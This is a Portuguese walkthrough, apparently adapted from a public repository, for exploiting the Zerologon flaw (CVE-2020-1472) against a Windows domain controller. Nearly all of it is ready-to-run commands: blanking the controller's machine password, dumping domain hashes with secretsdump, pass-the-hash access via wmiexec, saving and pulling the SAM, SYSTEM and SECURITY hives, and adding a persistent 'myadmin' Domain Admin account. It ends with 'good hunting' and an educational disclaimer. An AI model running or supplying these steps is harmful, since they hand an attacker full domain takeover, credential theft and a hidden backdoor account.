
zerologon script to exploit CVE-2020-1472 CVSS 10/10
script zerologon para explorar CVE-2020-1472 CVSS 10/10 Código do exploit baseado em https://www.secura.com/blog/zero-logon e https://github.com/SecuraBV/CVE-2020-1472. Pesquisa original e scanner por Secura, modificações por RiskSense Inc. https://github.com/risksense/zerologon
Para explorar, remova quaisquer instalações anteriores do Impacket que você tenha e instale o Impacket a partir de https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou mais recente.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Então, faça:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Se for bem-sucedido, você será capaz de:
sudo secretsdump.py -just-dc domain/hostname\$@ip
apertar 'Enter' no prompt de senha fará passar, o que deve lhe dar o hash de Administrador do Domínio. Depois de obtê-lo, use wmiexec.py no DC alvo com uma credencial do secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
e faça
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
E então você pode criar uma nova conta de Administrador só por precaução,
net user myadmin Hello1234 /ADD /DOMAIN
e adicione a nova conta ao grupo de administradores de domínio para obter privilégios totais,
net group "Domain Admins" myadmin /ADD /DOMAIN
e provavelmente exit agora do C:>
Então você pode executar
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
E isso deve mostrar o hash NT original da conta da máquina. Você pode então reinstalar esse hash original da conta da máquina no domínio por
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Reinstalar o hash original é necessário para que o DC continue operando normalmente.
E só para garantir se o processo de restauração funcionou,
sudo secretsdump.py -just-dc domain/hostname\$@ip
e apertar 'Enter' no prompt de senha não funcionará mais.
E terminamos aqui.
Boas caçadas.
DISCLAIMER: Isto é puramente para fins educacionais, não me responsabilizarei por quaisquer ações ou suas consequências INVADIR O DISPOSITIVO DE OUTRA PESSOA É ILEGAL E PUNÍVEL POR LEI.